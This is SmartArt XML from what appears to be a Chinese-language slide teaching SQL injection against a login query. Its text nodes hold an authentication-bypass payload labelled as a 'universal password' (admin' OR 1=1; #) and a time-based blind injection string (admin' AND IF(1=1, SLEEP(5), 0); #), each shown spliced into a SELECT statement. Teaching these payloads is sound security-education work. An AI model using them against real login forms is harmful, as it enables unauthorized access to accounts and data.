    <dgm:cxn modelId="{2F3BD891-CF94-41CC-95E4-58879459041D}" srcId="{F84E2699-DABD-47C9-B12F-1B437E2F5FA1}" destId="{1E69D144-CF12-4B6D-94DF-1FD0FC4DB507}" srcOrd="1" destOrd="0" parTransId="{8DD748BD-919D-4B09-B999-3C3FA6A79C56}" sibTransId="{0A637320-3189-47D7-81D7-5BBF73C4E65F}"/>
    <dgm:cxn modelId="{99FBD893-CBFF-404E-8C59-9844DBC331FF}" srcId="{42DD0FA6-E0E6-4FC6-976D-B1B7E1891785}" destId="{7EAE1D7C-11D4-45C2-896C-3310E97722BE}" srcOrd="0" destOrd="0" parTransId="{7422D2FE-C985-4A00-A0D7-1BC2209E57DE}" sibTransId="{1845F9EF-1C06-4F4A-BEFD-CB202F2D3472}"/>
    <dgm:cxn modelId="{1C5E6095-FD87-49C1-A82C-D3FCE54AEFD8}" type="presOf" srcId="{D1433D7B-7388-4C88-AECD-3DC9C4401736}" destId="{C48136C9-B32E-4E52-921F-7A779C220BD9}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{5F068895-8EC8-4258-9A4F-310A25EF1519}" type="presOf" srcId="{42DD0FA6-E0E6-4FC6-976D-B1B7E1891785}" destId="{9E00459B-0F43-4CCE-9BF3-672E611C0917}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{6EF890B8-DE2F-459F-97B9-568D18F00845}" type="presOf" srcId="{DF7E1589-FAFB-4F0E-9B4B-659156ABCD9C}" destId="{3F01DD4A-65B2-426B-A5EB-BD5AD2320919}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{6598F8C5-28E8-4291-B617-8B658BBD7637}" type="presOf" srcId="{F84E2699-DABD-47C9-B12F-1B437E2F5FA1}" destId="{566BE809-0ABF-4AB8-A38B-277829C1B9B0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{4B2922CF-292D-4720-9CB8-3B22C26FA31C}" type="presOf" srcId="{F95992CA-B3DF-44EC-A684-6CDD4E45CF71}" destId="{0B4B7111-3827-4C20-8111-DF43A1C984D1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{B0162FF7-2BA7-45E3-9DA3-A7204923C9CB}" srcId="{F95992CA-B3DF-44EC-A684-6CDD4E45CF71}" destId="{D1433D7B-7388-4C88-AECD-3DC9C4401736}" srcOrd="0" destOrd="0" parTransId="{019BDFFE-F8F8-410E-9011-EA727419B227}" sibTransId="{90DD54A5-F99D-4D54-A035-E9E75FDE8B75}"/>
    <dgm:cxn modelId="{13A87EFA-C448-4850-974C-EE7FDD78271A}" type="presOf" srcId="{42DD0FA6-E0E6-4FC6-976D-B1B7E1891785}" destId="{6CCE2C0B-A46D-490C-9430-D4BED0BBABE7}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{4338D0FB-7E8A-4D38-B584-A274410B6776}" type="presOf" srcId="{32BAAF43-D739-4A06-8F51-BC80EB9DD95D}" destId="{3F01DD4A-65B2-426B-A5EB-BD5AD2320919}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{F8E6416A-96D3-483B-9E9C-A1C6D2C0E539}" type="presParOf" srcId="{0B4B7111-3827-4C20-8111-DF43A1C984D1}" destId="{2311097E-9541-4DD9-9C6F-1467D4A4D336}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{A123F791-1916-408C-BD01-26BB5B0FD7BF}" type="presParOf" srcId="{2311097E-9541-4DD9-9C6F-1467D4A4D336}" destId="{66A43B76-41C9-4C64-B654-24B186F9CF0E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{92799D60-BFB6-4C08-8E05-55315AA83CF2}" type="presParOf" srcId="{2311097E-9541-4DD9-9C6F-1467D4A4D336}" destId="{C48136C9-B32E-4E52-921F-7A779C220BD9}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{823172D9-B5AC-4BC0-A95B-E1AF51B7AF34}" type="presParOf" srcId="{0B4B7111-3827-4C20-8111-DF43A1C984D1}" destId="{A7D765E3-B8DD-4747-B79D-3D55DDA321EA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{0BD421FC-BE5C-44F5-8EAC-99A9A8271A07}" type="presParOf" srcId="{0B4B7111-3827-4C20-8111-DF43A1C984D1}" destId="{3F01DD4A-65B2-426B-A5EB-BD5AD2320919}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{5358159B-2845-48B5-A3EE-0547F81F890D}" type="presParOf" srcId="{0B4B7111-3827-4C20-8111-DF43A1C984D1}" destId="{E3202350-DD34-4F55-85D6-66FA8C9DE5EE}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{5CB322CF-3DF0-49B2-A351-9C3C7163EF5E}" type="presParOf" srcId="{0B4B7111-3827-4C20-8111-DF43A1C984D1}" destId="{4B5B70B0-BD3B-450F-86BD-12C2BDC046A6}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{6AE92342-23A9-48D2-86CF-D7643E611BCE}" type="presParOf" srcId="{4B5B70B0-BD3B-450F-86BD-12C2BDC046A6}" destId="{566BE809-0ABF-4AB8-A38B-277829C1B9B0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{5FC2CD7D-B571-43E9-B025-01979FEBFA49}" type="presParOf" srcId="{4B5B70B0-BD3B-450F-86BD-12C2BDC046A6}" destId="{C600AF1F-E3F4-4A51-9598-948EDA7B3D53}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{E77CD7B9-A9E1-4D6B-8C14-1D7929C3F346}" type="presParOf" srcId="{0B4B7111-3827-4C20-8111-DF43A1C984D1}" destId="{19734135-C95F-44EE-8B3F-79EA0AD53E9B}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{C1B62408-AD3A-4D54-A381-828FC18D785D}" type="presParOf" srcId="{0B4B7111-3827-4C20-8111-DF43A1C984D1}" destId="{F0218530-B9FC-4066-AB22-BF201C936E58}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{C4AAA8C8-09BB-4AD8-8B1F-11EDED0C0079}" type="presParOf" srcId="{0B4B7111-3827-4C20-8111-DF43A1C984D1}" destId="{39B3ABB2-EE4F-4B1F-8766-73A9EF5B32EE}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{FA917E1F-BC5F-4DEE-BD3F-B3ABDD52E1A2}" type="presParOf" srcId="{0B4B7111-3827-4C20-8111-DF43A1C984D1}" destId="{841112B9-AFB9-4528-8C9A-A446514A3998}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{F148D29B-393A-4FEC-99B7-F3957327148F}" type="presParOf" srcId="{841112B9-AFB9-4528-8C9A-A446514A3998}" destId="{9E00459B-0F43-4CCE-9BF3-672E611C0917}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{85E62697-84C6-4F97-9CBF-750DAB905CF2}" type="presParOf" srcId="{841112B9-AFB9-4528-8C9A-A446514A3998}" destId="{6CCE2C0B-A46D-490C-9430-D4BED0BBABE7}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{DB5B050D-98C7-4944-9D68-E25F4E759E05}" type="presParOf" srcId="{0B4B7111-3827-4C20-8111-DF43A1C984D1}" destId="{44853D7C-B84F-42FE-AA79-2130239F50DC}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{4F5F547F-8518-4113-A683-EE02D6B6CAF8}" type="presParOf" srcId="{0B4B7111-3827-4C20-8111-DF43A1C984D1}" destId="{070E4AEE-6867-49A9-84D8-25BCE1040E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5992CA-B3DF-44EC-A684-6CDD4E45CF7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433D7B-7388-4C88-AECD-3DC9C4401736}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
            <a:t>尝试：’</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{019BDFFE-F8F8-410E-9011-EA727419B227}" type="parTrans" cxnId="{B0162FF7-2BA7-45E3-9DA3-A7204923C9CB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{90DD54A5-F99D-4D54-A035-E9E75FDE8B75}" type="sibTrans" cxnId="{B0162FF7-2BA7-45E3-9DA3-A7204923C9CB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F84E2699-DABD-47C9-B12F-1B437E2F5FA1}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="0" i="0" dirty="0"/>
            <a:t>万能密码：</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2000" b="0" i="0" dirty="0"/>
            <a:t>admin' OR 1=1; #</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1ABBF6E1-347D-424A-8B82-6FA5517BB2D8}" type="parTrans" cxnId="{CF93AA41-97FF-4784-84C0-636F76B9DFB5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{63A1B2A4-2F74-499F-8361-18AE7F97E265}" type="sibTrans" cxnId="{CF93AA41-97FF-4784-84C0-636F76B9DFB5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DF7E1589-FAFB-4F0E-9B4B-659156ABCD9C}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t>SELECT username, password FROM users WHERE username = </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0">
              <a:highlight>
                <a:srgbClr val="FF0000"/>
              </a:highlight>
            </a:rPr>
            <a:t>‘</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
              <a:highlight>
                <a:srgbClr val="FF0000"/>
              </a:highlight>
            </a:rPr>
            <a:t>’’</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0">
              <a:highlight>
                <a:srgbClr val="FF0000"/>
              </a:highlight>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t>AND password = '</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
            <a:t>输入的密码</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
            <a:t>';</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4B6589AC-C765-4E63-9793-FF8149612CD5}" type="parTrans" cxnId="{7AB57964-B198-4561-B3FB-41417582F9AD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{960071B1-A897-4EBF-981F-31562AE2D4DA}" type="sibTrans" cxnId="{7AB57964-B198-4561-B3FB-41417582F9AD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5864449E-EDE5-494B-BF9E-24DBF1280589}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t>SELECT username, password FROM users WHERE username = ‘</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:rPr>
            <a:t>admin’ AND IF(1=1, SLEEP(5), 0); </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="86786F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:rPr>
            <a:t>#</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" dirty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800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="65000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>AND password = '</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="65000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>输入的密码</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="65000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>';</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="65000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{68834645-C87B-4497-89FF-DFB4FC559A64}" type="parTrans" cxnId="{CC0C0D17-6287-4B5B-9633-8516DD2916FC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{963CA0CF-93F1-4081-B866-C22BA79C0DD5}" type="sibTrans" cxnId="{CC0C0D17-6287-4B5B-9633-8516DD2916FC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F6470A2F-1B36-41EB-B858-2600A47782F6}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2000" dirty="0"/>
            <a:t>SELECT </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t>username, password FROM users WHERE username = ‘</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:rPr>
            <a:t>admin' OR 1=1; </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="86786F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:rPr>
            <a:t># </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="86786F"/>
              </a:solidFill>
            </a:rPr>
            <a:t>'</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty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800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="65000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>AND password = '</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="65000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>输入的密码</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="65000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>';</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="65000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AE874BD0-0A91-4543-AC31-A3804B73B0B7}" type="parTrans" cxnId="{BD12A51A-D8DF-4B55-914C-5F534A08A7E6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9779512E-F4F4-4D34-A85D-7D50133176E3}" type="sibTrans" cxnId="{BD12A51A-D8DF-4B55-914C-5F534A08A7E6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{99569E83-AD4D-45FF-9E52-B2537107782A}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="0" i="0" dirty="0"/>
            <a:t>时间注入：</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2000" b="0" i="0" dirty="0"/>
            <a:t>admin' AND IF(1=1, SLEEP(5), 0); #</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C2C0CF7C-C1FA-48F9-A8CE-7935644FE608}" type="parTrans" cxnId="{36BEC50C-BA99-46B0-809F-BB996BE7E7B6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B6E5FBEF-D55B-4812-968F-C9415138426D}" type="sibTrans" cxnId="{36BEC50C-BA99-46B0-809F-BB996BE7E7B6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0B4B7111-3827-4C20-8111-DF43A1C984D1}" type="pres">
      <dgm:prSet presAssocID="{F95992CA-B3DF-44EC-A684-6CDD4E45CF71}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2311097E-9541-4DD9-9C6F-1467D4A4D336}" type="pres">
      <dgm:prSet presAssocID="{D1433D7B-7388-4C88-AECD-3DC9C4401736}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{66A43B76-41C9-4C64-B654-24B186F9CF0E}" type="pres">
      <dgm:prSet presAssocID="{D1433D7B-7388-4C88-AECD-3DC9C4401736}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C48136C9-B32E-4E52-921F-7A779C220BD9}" type="pres">
      <dgm:prSet presAssocID="{D1433D7B-7388-4C88-AECD-3DC9C4401736}" presName="parentText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3" custScaleX="29499" custScaleY="65978">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A7D765E3-B8DD-4747-B79D-3D55DDA321EA}" type="pres">
      <dgm:prSet presAssocID="{D1433D7B-7388-4C88-AECD-3DC9C4401736}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3F01DD4A-65B2-426B-A5EB-BD5AD2320919}" type="pres">
      <dgm:prSet presAssocID="{D1433D7B-7388-4C88-AECD-3DC9C4401736}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E3202350-DD34-4F55-85D6-66FA8C9DE5EE}" type="pres">
      <dgm:prSet presAssocID="{90DD54A5-F99D-4D54-A035-E9E75FDE8B75}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4B5B70B0-BD3B-450F-86BD-12C2BDC046A6}" type="pres">
      <dgm:prSet presAssocID="{F84E2699-DABD-47C9-B12F-1B437E2F5FA1}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{566BE809-0ABF-4AB8-A38B-277829C1B9B0}" type="pres">
      <dgm:prSet presAssocID="{F84E2699-DABD-47C9-B12F-1B437E2F5FA1}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C600AF1F-E3F4-4A51-9598-948EDA7B3D53}" type="pres">
      <dgm:prSet presAssocID="{F84E2699-DABD-47C9-B12F-1B437E2F5FA1}" presName="parentText" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3" custScaleX="96171" custScaleY="65978">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{19734135-C95F-44EE-8B3F-79EA0AD53E9B}" type="pres">
      <dgm:prSet presAssocID="{F84E2699-DABD-47C9-B12F-1B437E2F5FA1}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F0218530-B9FC-4066-AB22-BF201C936E58}" type="pres">
      <dgm:prSet presAssocID="{F84E2699-DABD-47C9-B12F-1B437E2F5FA1}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{39B3ABB2-EE4F-4B1F-8766-73A9EF5B32EE}" type="pres">
      <dgm:prSet presAssocID="{63A1B2A4-2F74-499F-8361-18AE7F97E265}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A8000D9C-3BFB-46BB-80D6-4ABE383FB11E}" type="pres">
      <dgm:prSet presAssocID="{99569E83-AD4D-45FF-9E52-B2537107782A}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E536D3EE-DC88-4C4F-B29F-0188FAAA7812}" type="pres">
      <dgm:prSet presAssocID="{99569E83-AD4D-45FF-9E52-B2537107782A}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{168E814E-BFD7-4033-B860-E7472FB36FA3}" type="pres">
      <dgm:prSet presAssocID="{99569E83-AD4D-45FF-9E52-B2537107782A}" presName="parentText" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3" custScaleX="119803" custScaleY="65978">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5CE988F7-D78A-4EB4-AEB7-D63AD61F89D8}" type="pres">
      <dgm:prSet presAssocID="{99569E83-AD4D-45FF-9E52-B2537107782A}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B26EF856-E590-4B9D-B74A-60A37DC10BCA}" type="pres">
      <dgm:prSet presAssocID="{99569E83-AD4D-45FF-9E52-B2537107782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44F002-2153-40F4-BA8B-D16B8A947E85}" type="presOf" srcId="{F84E2699-DABD-47C9-B12F-1B437E2F5FA1}" destId="{C600AF1F-E3F4-4A51-9598-948EDA7B3D53}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{36BEC50C-BA99-46B0-809F-BB996BE7E7B6}" srcId="{F95992CA-B3DF-44EC-A684-6CDD4E45CF71}" destId="{99569E83-AD4D-45FF-9E52-B2537107782A}" srcOrd="2" destOrd="0" parTransId="{C2C0CF7C-C1FA-48F9-A8CE-7935644FE608}" sibTransId="{B6E5FBEF-D55B-4812-968F-C9415138426D}"/>
    <dgm:cxn modelId="{AD40C50F-1E02-4ABC-BF13-63C9A04E940E}" type="presOf" srcId="{D1433D7B-7388-4C88-AECD-3DC9C4401736}" destId="{66A43B76-41C9-4C64-B654-24B186F9CF0E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{CC0C0D17-6287-4B5B-9633-8516DD2916FC}" srcId="{99569E83-AD4D-45FF-9E52-B2537107782A}" destId="{5864449E-EDE5-494B-BF9E-24DBF1280589}" srcOrd="0" destOrd="0" parTransId="{68834645-C87B-4497-89FF-DFB4FC559A64}" sibTransId="{963CA0CF-93F1-4081-B866-C22BA79C0DD5}"/>
    <dgm:cxn modelId="{BD12A51A-D8DF-4B55-914C-5F534A08A7E6}" srcId="{F84E2699-DABD-47C9-B12F-1B437E2F5FA1}" destId="{F6470A2F-1B36-41EB-B858-2600A47782F6}" srcOrd="0" destOrd="0" parTransId="{AE874BD0-0A91-4543-AC31-A3804B73B0B7}" sibTransId="{9779512E-F4F4-4D34-A85D-7D50133176E3}"/>
    <dgm:cxn modelId="{CF93AA41-97FF-4784-84C0-636F76B9DFB5}" srcId="{F95992CA-B3DF-44EC-A684-6CDD4E45CF71}" destId="{F84E2699-DABD-47C9-B12F-1B437E2F5FA1}" srcOrd="1" destOrd="0" parTransId="{1ABBF6E1-347D-424A-8B82-6FA5517BB2D8}" sibTransId="{63A1B2A4-2F74-499F-8361-18AE7F97E265}"/>
